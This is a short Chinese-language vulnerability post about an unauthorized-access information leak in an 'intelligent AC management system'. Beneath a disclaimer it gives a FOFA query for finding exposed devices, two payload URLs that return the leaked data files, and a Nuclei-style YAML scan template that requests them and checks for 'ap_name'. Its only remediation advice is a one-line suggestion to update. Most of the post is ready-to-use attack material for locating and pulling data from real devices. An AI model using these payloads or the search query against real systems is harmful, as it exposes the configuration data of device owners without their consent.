文章目录
- 免责声明
- 漏洞描述
- 搜索语法
- 漏洞复现
- yaml
- 修复建议
免责声明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露
搜索语法
fofa
header="HTTPD_ac 1.0"
漏洞复现
payload
http://ip/actpt.data
payload
http://ip/actpt_5g.data
yaml
id: intelligent-AC-Manage-system-Information-breachesinfo: name: 智能AC管理系统信息泄露漏洞author: xldescription: information breachesseverity: highhttp: - raw: - |+GET /actpt.data HTTP/1.1Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36- raw: - |+GET /actpt_5g.data HTTP/1.1Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36matchers-condition: and
matchers: - type: wordpart: bodywords: - 'ap_name'- type: statusstatus:- 200修复建议
更新到最新版本
